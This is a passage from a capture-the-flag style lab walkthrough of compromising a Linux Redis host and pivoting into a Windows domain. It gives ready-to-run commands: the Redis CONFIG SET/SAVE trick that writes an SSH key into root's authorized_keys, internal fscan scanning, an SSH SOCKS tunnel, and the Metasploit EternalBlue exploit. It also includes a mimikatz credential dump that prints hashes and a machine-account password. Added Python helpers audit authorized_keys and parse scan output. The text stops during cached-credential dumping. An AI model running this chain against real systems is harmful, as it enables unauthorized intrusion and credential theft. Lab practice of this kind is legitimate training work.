I. Lab Information



II. Information Gathering
TCP port scan + service fingerprinting + OS detection:
```bash
sudo rustscan -a 192.168.111.20 -r 1-65535 -- -sV -O -Pn -n -oA TCP_PORTS_NAMP
```
Output (excerpt):
```bash
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
81/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
6379/tcp open redis syn-ack ttl 63 Redis key-value store 2.8.17
```
Key information:
- OS: Ubuntu
- Port 6379: a very old Redis version; with the default configuration there is a very high chance of unauthenticated access
UDP port scan + fingerprinting:
```bash
sudo nmap -sV -sU --top-ports 20 192.168.111.20 -Pn -n -oA UDP_TOP20_PORTS
```
In the scan results every port is either closed or open|filtered, which gives little useful information.
Approach: deal with the TCP ports first; if there is no breakthrough on TCP, come back to UDP and scan it with specialized tools.
Putting this together, port 6379 is the top priority, followed by the two HTTP services on ports 80 and 81.
III. Redis Unauthenticated Access
In an old Redis release such as 2.8:
- The default listen address is 0.0.0.0 (open on every network interface)
- No password is set (requirepass is empty)
- protected-mode did not exist yet; it was only introduced in 3.2, so 2.8 has no such feature at all
- A lab environment usually adds no extra firewall rules or hardening
protected-mode is a default security mechanism introduced in Redis 3.2. In short: when Redis has no password set (requirepass empty) and is not explicitly bound to local-only access (bind 127.0.0.1), it automatically rejects all connections from external networks and only accepts connections from the local machine (localhost).
Try logging in without a password:
```bash
redis-cli -h 192.168.111.20 -p 6379
```
Login successful:

Do some basic information gathering with the following commands:
- ping: checks that the connection is really established
- info: Redis version, OS, memory, number of connected clients, etc.
- client list: IP and port of every connected client
- config get dbfilename: current RDB file name
- config get dir: current RDB persistence directory
Key information:
```
redis_version:2.8.17
os:Linux 5.4.0-66-generic x86_64
dbfilename dump.rdb
dir /root
rdb_last_save_time:1775801194
rdb_last_bgsave_status:ok
```
The RDB persistence directory is set to /root, and from rdb_last_save_time and rdb_last_bgsave_status we can infer that the directory is not only configured but has also been written to successfully.
We know that /root has permissions 700, so only the root user can write to it.
Therefore we can confirm that this Redis instance is running as root.
Since the port scan showed port 22 open, writing an SSH public key through Redis and then logging in over SSH becomes the immediate goal.
Generate an SSH key pair on Kali:
```bash
ssh-keygen -t rsa -f ./target
```
Read the public key:
```bash
❯ cat target.pub
ssh-rsa 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 zyf@kali
```
Back in redis, write the public key as a value:
```bash
SET pubkey "\n\nssh-rsa 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 zyf@kali\n\n"
```
Set the directory:
```bash
CONFIG SET dir /root/.ssh/
```
Set the save file name and save:
```bash
CONFIG SET dbfilename authorized_keys
SAVE
```
Note: writing through CONFIG SET dir + dbfilename followed by SAVE is an overwrite. Redis generates a brand-new RDB binary snapshot that replaces the target file (here /root/.ssh/authorized_keys) from scratch; it does not append to the existing content. The \n newlines placed in front of the public key are needed because the RDB format is binary: the file always starts with the "REDIS" magic string, followed by a version number, metadata and other binary junk, and only after that comes the pubkey value you SET. Without the newlines the key string would be glued directly onto that binary junk, producing one long line like "[binary garbage]ssh-rsa AAA...", which sshd would treat as an invalid line and skip while parsing authorized_keys, so the key would never take effect.
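A defender-side check for the overwrite described above, added here as an example and not part of the original post: it reads an authorized_keys file the way sshd does (line by line, key type then base64 blob), reports which lines hold a loadable key, and flags the RDB magic and binary lines that betray a file written by Redis. The RDB-like byte layout and the key blob are constructed for the demo (not byte-exact RDB, not real key material).

```python
"""Audit an authorized_keys file for the Redis-RDB write pattern.

Added example (not from the original post). The RDB-like file layout and the
key blob below are constructed stand-ins: only the layout matters, not the
exact RDB encoding.
"""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass, field

RDB_MAGIC = b"REDIS"

# Roughly what sshd accepts: optional options field, key type, base64 blob, optional comment.
KEY_LINE_RE = re.compile(
    rb"^(?:\S+\s+)?(ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp(?:256|384|521))"
    rb"\s+([A-Za-z0-9+/=]+)(?:\s+.*)?$"
)


@dataclass
class AuditResult:
    rdb_header: bool                                       # file starts with the "REDIS" magic string
    valid_keys: list[str] = field(default_factory=list)    # key types sshd would load
    ignored_lines: int = 0                                 # non-empty lines sshd would skip
    binary_lines: int = 0                                  # ignored lines containing non-printable bytes


def parse_key_line(line: bytes) -> str | None:
    """Return the key type if `line` is a key line sshd would load, else None."""
    m = KEY_LINE_RE.match(line)
    if not m:
        return None
    keytype, b64 = m.group(1), m.group(2)
    try:
        blob = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    # Wire format: uint32 length followed by the key type, which must match the text.
    if len(blob) < 4:
        return None
    n = int.from_bytes(blob[:4], "big")
    if blob[4:4 + n] != keytype:
        return None
    return keytype.decode()


def audit_authorized_keys(data: bytes) -> AuditResult:
    """Walk the file line by line, as sshd does, and classify each line."""
    result = AuditResult(rdb_header=data.startswith(RDB_MAGIC))
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue
        keytype = parse_key_line(line)
        if keytype:
            result.valid_keys.append(keytype)
            continue
        result.ignored_lines += 1
        if any(b < 0x20 or b > 0x7E for b in line):
            result.binary_lines += 1
    return result


def make_key_line(keytype: bytes, comment: bytes) -> bytes:
    """Constructed key line: correct layout, dummy payload (not a real key)."""
    payload = b"\x00\x00\x00\x03\x01\x00\x01"  # placeholder, not real key material
    blob = len(keytype).to_bytes(4, "big") + keytype + payload
    return keytype + b" " + base64.b64encode(blob) + b" " + comment


def build_rdb_like_file(value: bytes) -> bytes:
    """Constructed stand-in for the snapshot SAVE writes: magic, version,
    binary metadata, the stored string, trailer. Not a byte-exact RDB."""
    return (RDB_MAGIC + b"0006"
            + b"\xfe\x00\xfb\x01\x00\x00\x06pubkey" + bytes([len(value)])
            + value
            + b"\xff" + b"\x00" * 8)


if __name__ == "__main__":
    key = make_key_line(b"ssh-rsa", b"user@host")
    for label, value in (("with \\n padding", b"\n\n" + key + b"\n\n"), ("no padding", key)):
        r = audit_authorized_keys(build_rdb_like_file(value))
        print(f"{label}: rdb_header={r.rdb_header} valid={r.valid_keys} "
              f"ignored={r.ignored_lines} binary={r.binary_lines}")
```

Run against a real file with `audit_authorized_keys(open(path, "rb").read())`; a `rdb_header` of True or any `binary_lines` in an authorized_keys file is a strong indicator of this technique.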
Try logging in over SSH:
```bash
ssh root@192.168.111.20 -i ./target
```

Login successful.
IV. Ubuntu Information Gathering
Start with the native commands:
```bash
root@ubuntu:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b1:41:a3 brd ff:ff:ff:ff:ff:ff
inet 192.168.111.20/24 brd 192.168.111.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:41a3/64 scope link
valid_lft forever preferred_lft forever
3: ens38: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b1:f7:eb brd ff:ff:ff:ff:ff:ff
inet 192.168.52.10/24 brd 192.168.52.255 scope global ens38
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:f7eb/64 scope link
valid_lft forever preferred_lft forever
```
Two NICs:
- External: 192.168.111.20
- Internal: 192.168.52.10
- Internal subnet: 192.168.52.0/24

```bash
root@ubuntu:~# cat /proc/version
Linux version 5.4.0-66-generic (buildd@lgw01-amd64-016) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021
root@ubuntu:~# cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
```
```bash
root@ubuntu:~# hostname && cat /etc/issue && uname -a && cat /etc/hosts
ubuntu
Ubuntu 18.04.5 LTS \n \l
Linux ubuntu 5.4.0-66-generic #74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
127.0.0.1 localhost
127.0.1.1 ubuntu
47.101.57.72 whoamianony.top
127.0.0.1 www.whopen.com
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```
Routing information:
```bash
root@ubuntu:~# ip route show
192.168.52.0/24 dev ens38 proto kernel scope link src 192.168.52.10
192.168.111.0/24 dev ens33 proto kernel scope link src 192.168.111.20
```
So the host is directly connected to the internal network.
Check the ARP cache:
```bash
root@ubuntu:~# ip neigh
192.168.52.20 dev ens38 lladdr 00:50:56:b1:7e:66 STALE
192.168.111.25 dev ens33 lladdr 00:50:56:b1:87:ea REACHABLE
```
This immediately reveals a new internal host (192.168.52.20):

List all processes:
```bash
root@ubuntu:~# ps aux
```
No antivirus was found.
Check the firewall and outbound rules:
```bash
root@ubuntu:~# iptables -L -v -n 2>/dev/null
Chain INPUT (policy ACCEPT 71 packets, 4966 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 66 packets, 5906 bytes)
pkts bytes target prot opt in out source destination
root@ubuntu:~# ufw status 2>/dev/null
Status: inactive
```
No firewall; inbound and outbound traffic is unrestricted.
The next step is internal network reconnaissance.
V. Fscan
Upload fscan to the server with scp and start internal reconnaissance:
```bash
scp -i target /usr/local/bin/fscan root@192.168.111.20:/tmp/
```
Once uploaded, scan directly:
```bash
./fscan -h 192.168.52.0/24
```
I forgot to exclude the local host from the scan 😛, so it took a little longer. You can exclude it with:
```bash
./fscan -h 192.168.52.0/24 -hn 192.168.52.10
```
Results:
```
start infoscan
(icmp) Target 192.168.52.10 is alive
(icmp) Target 192.168.52.20 is alive
(icmp) Target 192.168.52.30 is alive
[*] Icmp alive hosts len is: 3
192.168.52.10:81 open
192.168.52.10:80 open
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.30:135 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.10:6379 open
192.168.52.30:8080 open
192.168.52.20:8000 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle http://192.168.52.10 code:502 len:584 title:502 Bad Gateway
[*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[+] MS17-010 192.168.52.30 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan http://192.168.52.30:8080 [通达OA]
[*] WebTitle http://192.168.52.10:81 code:200 len:17474 title:Laravel
[*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.52.20:8000 [Laravel]
[+] InfoScan http://192.168.52.10:81 [Laravel]
[+] PocScan http://192.168.52.30:8080 tongda-user-session-disclosure
[+] Redis 192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
[+] Redis 192.168.52.10:6379 like can write /root/.ssh/
[+] Redis 192.168.52.10:6379 like can write /var/spool/cron/
[+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
[+] PocScan http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129
已完成 8/10 [-] ssh 192.168.52.10:22 root Aa1234. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 8/10 [-] ssh 192.168.52.10:22 admin Admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 8/10 [-] ssh 192.168.52.10:22 admin 1qaz2wsx ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 10/10
[*] 扫描结束,耗时: 7m12.740113763s
```
Forgetting to exclude the local host was a slip, but it also showed me how convenient fscan is: everything I had worked out earlier came out of a single fscan run... That said, it depends on fscan's fingerprint and vulnerability databases, so it will not cover every case.
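The post groups the fscan output by host manually; the parser below, an added example that is not part of fscan or the original post, does that grouping from fscan's text lines and mirrors the -hn option by skipping an excluded address. SAMPLE is copied from the scan output above, and the regexes only assume the line shapes seen there.

```python
"""Group fscan text output by host.

Added example, not part of fscan or the original post. SAMPLE is copied from
the scan output above; the regexes only cover the line shapes seen there.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SAMPLE = """\
(icmp) Target 192.168.52.10 is alive
(icmp) Target 192.168.52.20 is alive
(icmp) Target 192.168.52.30 is alive
192.168.52.10:81 open
192.168.52.20:22 open
192.168.52.30:135 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.10:6379 open
192.168.52.30:8080 open
192.168.52.20:8000 open
[*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[+] MS17-010 192.168.52.30 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan http://192.168.52.20:8000 [Laravel]
[+] PocScan http://192.168.52.30:8080 tongda-user-session-disclosure
[+] Redis 192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
[+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
ALIVE_RE = re.compile(rf"^\(icmp\) Target {IP} is alive$")
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios {IP} (.+)$")
WEBTITLE_RE = re.compile(rf"^\[\*\] WebTitle https?://{IP}(?::(\d+))? .*title:(.*)$")
FINDING_RE = re.compile(rf"^\[\+\] (\S+) (?:https?://)?{IP}(?::(\d+))?\s*(.*)$")


@dataclass
class HostInfo:
    ports: set[int] = field(default_factory=set)
    titles: dict[int, str] = field(default_factory=dict)     # web port -> page title
    products: dict[int, str] = field(default_factory=dict)   # web port -> InfoScan fingerprint
    netbios: str = ""                                        # NetBIOS name / OS string
    findings: list[str] = field(default_factory=list)        # every other [+] line, triage these first


def parse_fscan(text: str, exclude: frozenset[str] = frozenset()) -> dict[str, HostInfo]:
    """Parse fscan output; `exclude` plays the role of -hn (e.g. the scanning host itself)."""
    hosts: dict[str, HostInfo] = {}

    def host(ip: str) -> HostInfo | None:
        """Return the record for ip, or None if ip is excluded."""
        if ip in exclude:
            return None
        return hosts.setdefault(ip, HostInfo())

    for line in text.splitlines():
        line = line.strip()
        if m := ALIVE_RE.match(line):
            host(m.group(1))  # register the host even if no port line follows
        elif m := PORT_RE.match(line):
            if (h := host(m.group(1))) is not None:
                h.ports.add(int(m.group(2)))
        elif m := NETBIOS_RE.match(line):
            if (h := host(m.group(1))) is not None:
                h.netbios = m.group(2)
        elif m := WEBTITLE_RE.match(line):
            if (h := host(m.group(1))) is not None:
                h.titles[int(m.group(2) or 80)] = m.group(3).strip()
        elif m := FINDING_RE.match(line):
            kind, ip, port, rest = m.group(1), m.group(2), m.group(3), m.group(4).strip()
            if (h := host(ip)) is None:
                continue
            if kind == "InfoScan":
                h.products[int(port or 80)] = rest.strip("[]")
            else:
                h.findings.append(f"{kind}{':' + port if port else ''} {rest}")
        # anything else ([-] failed logins, progress counters) carries no host fact
    return hosts


def summarize(hosts: dict[str, HostInfo]) -> str:
    """One block per host, sorted by address, findings listed last so they stand out."""
    out = []
    for ip in sorted(hosts, key=lambda s: tuple(int(p) for p in s.split("."))):
        h = hosts[ip]
        out.append(f"{ip}  ports={sorted(h.ports)}" + (f"  netbios={h.netbios}" if h.netbios else ""))
        for port in sorted(set(h.titles) | set(h.products)):
            out.append(f"  :{port}  {h.products.get(port, '-')}  {h.titles.get(port, '-')}")
        for finding in h.findings:
            out.append(f"  [+] {finding}")
    return "\n".join(out)


if __name__ == "__main__":
    print(summarize(parse_fscan(SAMPLE, exclude=frozenset({"192.168.52.10"}))))
```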
Summarizing the information:
1. 192.168.52.20
Open ports and fingerprints:
```
192.168.52.20:22 open
192.168.52.20:8000 open
[*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.52.20:8000 [Laravel]
```
The tool directly flagged a CVE:
```
[+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
```
The tool also tried weak passwords against port 22, with no result:
```
已完成 9/10 [-] ssh 192.168.52.20:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 10/10
```
2. 192.168.52.30
Open ports:
```
192.168.52.30:135 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:8080 open
```
Fingerprints:
```
[*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan http://192.168.52.30:8080 [通达OA]
```
- This is a domain environment:
  - Domain: whoamianony.org
  - Hostname: PC1
- Port 8080 runs "通达OA网络智能办公系统" (Tongda OA), which may have a known n-day vulnerability
The scan also found this host vulnerable to EternalBlue:
```
[+] MS17-010 192.168.52.30 (Windows 7 Professional 7601 Service Pack 1)
```
In summary, the key information obtained:

VI. EternalBlue
MSF has a module for it, so EternalBlue can be attempted directly.
Before that, set up the proxy.
1. Setting up the proxy
Depending on whether the payload used later is reverse or bind, we choose a forward or a reverse proxy accordingly.
I chose "forward proxy + bind payload".
Set up a SOCKS5 proxy:
```bash
ssh -i target -D 1080 -N -C root@192.168.111.20
```
2. The ms17_010_eternalblue module
Start MSF:
```
msfconsole
```
Set the global proxy:
```
setg Proxies socks5h://127.0.0.1:1080
```
Select the EternalBlue module:
```
msf > use exploit/windows/smb/ms17_010_eternalblue
```
Choose the payload:
```
msf exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/bind_tcp
```
Note: choose the bind variant.
Set the required parameters:
```
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30
```
Run the module:
```
run
```
This yields the highest privileges on the host straight away:

3. Information gathering
(1) Network information
Gather the basic information:
```
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : PC1
Primary Dns Suffix . . . . . . . : whoamianony.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : whoamianony.org
Ethernet adapter �������� 4:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
Physical Address. . . . . . . . . : 00-50-56-B1-7F-9E
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::a48c:626e:c838:265%23(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 721423401
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : 192.168.93.30
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter Npcap Loopback Adapter:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Npcap Loopback Adapter
Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%22(Preferred)
Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 268566604
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter ��������:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B1-54-16
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::858b:43d6:476c:6a3%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.52.30(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.52.2
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : 192.168.52.2
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{55ECD929-FBB2-4D96-B43D-8FFEB14A169F}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
```
This machine also has two NICs:
- 192.168.52.30
- 192.168.93.20
It also tells us the hostname is PC1 and the domain is whoamianony.org.
And from this entry:
```
DNS Servers . . . . . . . . . . . : 192.168.93.30
```
we can be fairly confident that the domain controller's IP is 192.168.93.30 (in a domain environment, the DNS server is usually the DC).
(2) Confirming the domain controller
Verify the conclusion above:
```powershell
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001
C:\Windows\system32>net group "Domain Controllers" /domain
net group "Domain Controllers" /domain
The request will be processed at a domain controller for domain whoamianony.org.
System error 5 has occurred.
Access is denied.
```
A puzzle: I clearly have the highest privileges, yet access is denied?
Commands of the form net ... /domain do not query with the local SYSTEM identity; they use this host's computer account (the machine account, e.g. WIN-XXXX$@whoamianony.org) to send LDAP/SAMR queries to the domain controller over the network.
Switch back to MSF and use its built-in domain enumeration module post/windows/gather/enum_domain.
Background the current session:
```
meterpreter > bg
```
Check the id of the backgrounded session:

Load the module and configure it:
```
msf exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_domain
msf post(windows/gather/enum_domain) > set session 1
session => 1
```
Run it:
```
run
```
Result:
```
msf post(windows/gather/enum_domain) > run
[+] Domain FQDN: whoamianony.org
[+] Domain NetBIOS Name: WHOAMIANONY
[+] Domain Controller: DC.whoamianony.org (IP: 192.168.93.30)
[*] Post module execution completed
```
Domain controller: DC.whoamianony.org (192.168.93.30)
(3)路由信息
查看本地的路由是否能到达域控:
C:\Windows\system32>route print
route print
===========================================================================
Interface List
23...00 50 56 b1 7f 9e ......Intel(R) PRO/1000 MT Network Connection #2
22...02 00 4c 4f 4f 50 ......Npcap Loopback Adapter
11...00 50 56 b1 54 16 ......Intel(R) PRO/1000 MT Network Connection
1...........................Software Loopback Interface 1
12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.52.2 192.168.52.30 266
127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
169.254.0.0 255.255.0.0 On-link 169.254.129.186 286
169.254.129.186 255.255.255.255 On-link 169.254.129.186 286
169.254.255.255 255.255.255.255 On-link 169.254.129.186 286
192.168.52.0 255.255.255.0 On-link 192.168.52.30 266
192.168.52.30 255.255.255.255 On-link 192.168.52.30 266
192.168.52.255 255.255.255.255 On-link 192.168.52.30 266
192.168.93.0 255.255.255.0 On-link 192.168.93.20 266
192.168.93.20 255.255.255.255 On-link 192.168.93.20 266
192.168.93.255 255.255.255.255 On-link 192.168.93.20 266
224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 192.168.52.30 266
224.0.0.0 240.0.0.0 On-link 192.168.93.20 266
224.0.0.0 240.0.0.0 On-link 169.254.129.186 286
255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
255.255.255.255 255.255.255.255 On-link 192.168.52.30 266
255.255.255.255 255.255.255.255 On-link 192.168.93.20 266
255.255.255.255 255.255.255.255 On-link 169.254.129.186 286
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 192.168.52.2 Default
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 306 ::1/128 On-link
11 266 fe80::/64 On-link
23 266 fe80::/64 On-link
22 286 fe80::/64 On-link
11 266 fe80::858b:43d6:476c:6a3/128
On-link
23 266 fe80::a48c:626e:c838:265/128
On-link
22 286 fe80::b461:ccad:e30f:81ba/128
On-link
1 306 ff00::/8 On-link
11 266 ff00::/8 On-link
23 266 ff00::/8 On-link
22 286 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
The table has an on-link route for 192.168.93.0/24 via the 192.168.93.20 interface, so this host reaches the domain controller at 192.168.93.30 directly, without going through the default gateway.
(4) Credential gathering
Dump credentials with kiwi:
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
PC1$ WHOAMIANONY 3e6a3d8c713b4821eaa51aab25f52074 d8e1318a24c64b8fcc89dc8609b09af50342bacf
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
PC1$ WHOAMIANONY %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol
;
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
pc1$ whoamianony.org %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f
>[ol;
pc1$ WHOAMIANONY.ORG %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f
>[ol;
Only the credentials of this host's own domain machine account were found; nothing belonging to a domain administrator.
Try a few more commands (several credential-dumping commands were attempted; only the one that produced something useful is shown):
meterpreter > kiwi_cmd "lsadump::cache"
Domain : PC1
SysKey : fd4639f4e27c79683ae9fee56b44393f
